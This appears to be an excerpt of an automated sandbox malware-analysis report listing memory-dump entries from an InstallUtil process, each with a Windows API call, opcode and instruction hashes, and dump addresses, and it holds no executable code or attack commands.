                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6630000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: >I'L
                                • API String ID: 0-3948173599
                                • Opcode ID: 8339f12bc5e652857a4d2d05e1ef122d42935bc7ba8577bdf545781fb3ea5a2d
                                • Instruction ID: 670b62a08a8e92ef23130816b930c611d7ed78a098285338b24029d3dab01439
                                • Opcode Fuzzy Hash: 8339f12bc5e652857a4d2d05e1ef122d42935bc7ba8577bdf545781fb3ea5a2d
                                • Instruction Fuzzy Hash: 7D412131E043999FCB14DFA9D8006DEBBF9EF89210F15856AE404A7381DB789844CBE1
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06661141
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2499624443.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6660000_InstallUtil.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID: >I'L
                                • API String ID: 2714655100-3948173599
                                • Opcode ID: 47eb8e965652958f50e007ca718936097ae006e7503ab9fd60550378ab7b22a5
                                • Instruction ID: ec27aa0950df40999d11dcf0c008379bfd5561504425ab400086da6fe01a9334
                                • Opcode Fuzzy Hash: 47eb8e965652958f50e007ca718936097ae006e7503ab9fd60550378ab7b22a5
                                • Instruction Fuzzy Hash: FF4108B5A00309DFDB54CF5AC848AAAFBF5FF89314F24C459E519AB321D375A841CBA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1AEFF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2493662700.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2c10000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: >I'L
                                • API String ID: 3793708945-3948173599
                                • Opcode ID: 7d892bc88b5628bd742eec0e2e6ac5910c2f5d7cdfd76d6e8db5fd350ac28d45
                                • Instruction ID: 554a5d684cea99384febc67387faa6e7375c6f0e575ef95b21776a1e75539070
                                • Opcode Fuzzy Hash: 7d892bc88b5628bd742eec0e2e6ac5910c2f5d7cdfd76d6e8db5fd350ac28d45
                                • Instruction Fuzzy Hash: C32114B5D01248EFDB10CFAAD984ADEBBF4EB48310F14801AE914A7350C379A944CFA4
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1AEFF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2493662700.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2c10000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: >I'L
                                • API String ID: 3793708945-3948173599
                                • Opcode ID: cfcc5430935e6d33697d2130007e401127d3d85649dda8192c61f01c3e89c0ea
                                • Instruction ID: cf76fbc8a6b4f2a391eabc5f16f4697ffc70c8c21f3e70f76d2f0ddd12f57bc3
                                • Opcode Fuzzy Hash: cfcc5430935e6d33697d2130007e401127d3d85649dda8192c61f01c3e89c0ea
                                • Instruction Fuzzy Hash: 6621E4B5D01248DFDB10CFAAD584ADEBBF4EB48314F14801AE914A7350D379A940CF65
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06633D22), ref: 06633E0F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2499567202.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6630000_InstallUtil.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: >I'L
                                • API String ID: 1890195054-3948173599
                                • Opcode ID: 78ebb642cd5cdc672d04035e323945d84332b2aae1309d3496e590e36032ac9f
                                • Instruction ID: 095929f37883016df045c277299962030444ddeaf72d9d859ec0894e651cbf24
                                • Opcode Fuzzy Hash: 78ebb642cd5cdc672d04035e323945d84332b2aae1309d3496e590e36032ac9f
                                • Instruction Fuzzy Hash: 1C1106B1C006699BDB14CF9AC944BDEFBF4EB48220F11812AD814B7341D778A945CFA5
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06633D22), ref: 06633E0F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2499567202.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6630000_InstallUtil.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: >I'L
                                • API String ID: 1890195054-3948173599
                                • Opcode ID: ee177a071dee614ca3916b9fe1474c3f5dfba5a00593b0355af501c097e6db4a
                                • Instruction ID: 5f46ca33198db2aed4ad7fc6f6f6071d0d6939608f0d37dfa8b4f3487365590e
                                • Opcode Fuzzy Hash: ee177a071dee614ca3916b9fe1474c3f5dfba5a00593b0355af501c097e6db4a
                                • Instruction Fuzzy Hash: 1211F2B1C006A99FDB10DF9AC544B9EFBF4EB48210F11812AE918B7340D778A951CFE5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 066648ED
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2499624443.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6660000_InstallUtil.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID: >I'L
                                • API String ID: 2538663250-3948173599
                                • Opcode ID: 82ab9fdea51f67baa027a7181fe2c842846d9ed80aa5336e5527e104804f88f9
                                • Instruction ID: 36847a19156cc915a55d4264e2effb1f1b38a23b0f4fa335ead4f14a7b58148e
                                • Opcode Fuzzy Hash: 82ab9fdea51f67baa027a7181fe2c842846d9ed80aa5336e5527e104804f88f9
                                • Instruction Fuzzy Hash: 721153B5C00248CFDB20CFAAE485BDEBBF4EB48310F20841AE418A7710C378A944CFA4
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 066648ED
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2499624443.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6660000_InstallUtil.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID: >I'L
                                • API String ID: 2538663250-3948173599
                                • Opcode ID: 0f8543e37fcbf0e5c59176ce1af8af07672828645bbd1c4e7744116e86be511a
                                • Instruction ID: c88e4d20532991a6cd3dbd8a57c456971da14090a20f50bde9615dd9cf2f45c6
                                • Opcode Fuzzy Hash: 0f8543e37fcbf0e5c59176ce1af8af07672828645bbd1c4e7744116e86be511a
                                • Instruction Fuzzy Hash: 1C1133B5C00748DFDB20DF9AD444B9EBBF4EB48210F208419E518A7310C379A940CFA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2493315262.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2b8d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18d146bf3b250850f8565b700a6aa7abf9f8dda2fc1d0bd06fc3f435e816f43f
                                • Instruction ID: 524f4fb178bae296696fb2a7024d64b997dc983d5f816989b6835234ee16082b
                                • Opcode Fuzzy Hash: 18d146bf3b250850f8565b700a6aa7abf9f8dda2fc1d0bd06fc3f435e816f43f
                                • Instruction Fuzzy Hash: 0021D071604304EFDB14EF24D994B26BB65EB84314F20C5AEE80E4B2D6C336D847CA62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2493315262.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2b8d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d9fb0069599902d7b2c271b3d3e03f5a00c9edb82187430b1d511a250a21d140
                                • Instruction ID: 25aab654172161b092510dc5f9ac9538949c3dea88ac9949eb418f74c863d730
                                • Opcode Fuzzy Hash: d9fb0069599902d7b2c271b3d3e03f5a00c9edb82187430b1d511a250a21d140
                                • Instruction Fuzzy Hash: 6921CF75508380CFCB02CF20D9A0B15BF71EB45214F28C5EBD8498B6A3C33AD80ACB62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2493168272.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_155d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0771e026573327eea076216102f7ad5b35ff390e3b1ed1384cd4fe657dcb8ce7
                                • Instruction ID: 883e684a4584790bd8a2f26bef2020432c0772e040ceee011ead9f4fb173215e
                                • Opcode Fuzzy Hash: 0771e026573327eea076216102f7ad5b35ff390e3b1ed1384cd4fe657dcb8ce7
                                • Instruction Fuzzy Hash: 7DF06272405344EEEB208E1AD984B66FFE8EB41624F18C55BED0C5F287C2799844CAB1